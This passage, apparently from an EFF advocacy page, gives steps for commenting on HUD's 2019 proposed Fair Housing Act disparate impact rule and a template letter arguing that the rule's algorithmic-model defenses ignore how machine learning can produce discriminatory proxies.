  2. Start with the draft language below regarding EFF’s concerns with HUD’s proposed rule. We encourage you to tailor the comments to reflect your specific concerns. Adapting the language increases the chances that HUD will count your comment as a “unique” submission, which is important because HUD is required to read and respond to unique comments.
  3. Hit “Submit Comment” and feel good about doing your part to protect the civil rights of vulnerable communities and to educate the government about how technology actually works!

Comments are due by Friday, October 18, 2019 at 11:59 PM ET.

To Whom It May Concern:

I write to oppose HUD’s proposed rule, which would change the disparate impact standard for the agency’s enforcement of the Fair Housing Act. The proposed rule would set up a burden-shifting framework that would make it nearly impossible for a plaintiff to allege a claim of unjustified discriminatory effect. Moreover, the proposed rule offers a safe harbor for defendants who rely on algorithmic models to make housing decisions. HUD’s approach is unscientific and fails to understand how machine learning actually works.

HUD’s proposed rule offers three complete algorithmic defenses if: (1) the inputs used in the algorithmic model are not themselves “substitutes or close proxies” for protected characteristics and the model is predictive of risk or other valid objective; (2) a third party creates or manages the algorithmic model; or (3) a neutral third party examines the model and determines the model’s inputs are not close proxies for protected characteristics and the model is predictive of risk or other valid objective.

In the first and third defenses, HUD indicates that as long as a model’s inputs are not discriminatory, the overall model cannot be discriminatory. However, the whole point of sophisticated machine-learning algorithms is that they can learn how combinations of different inputs might predict something that any individual variable might not predict on its own. These combinations of different variables could be close proxies for protected classes, even if the original input variables are not. Apart from combinations of inputs, other factors, such as how an AI has been trained, can also lead to a model having a discriminatory effect, which HUD does not account for in its proposed rule. 

The second defense will shield housing providers, mortgage lenders, and insurance companies that rely on a third party’s algorithmic model, which will be the case for most defendants. This defense gets rid of any incentive for defendants not to use models that result in discriminatory effect or to pressure model makers to ensure their algorithmic models avoid discriminatory outcomes. Moreover, it is unclear whether a plaintiff could actually get relief by going after a model maker, a distant and possibly unknown third party, rather than a direct defendant like a housing provider. Accordingly, this defense could allow discriminatory effects to continue without recourse. Even if a plaintiff can sue a third-party creator, trade secrets law could prevent the public from finding out about the discriminatory impact of the algorithmic model.

HUD claims that its proposed affirmative defenses are not meant to create a “special exemption for parties using algorithmic models” and thereby insulate them from disparate impact lawsuits. But that is exactly what the proposed rule will do. Today, a defendant’s use of an algorithmic model in a disparate impact case is considered on a case-by-case basis, with careful attention paid to the particular facts at issue. That is exactly how it should work.

I respectfully urge HUD to rescind its proposed rule and continue to use its current disparate impact standard.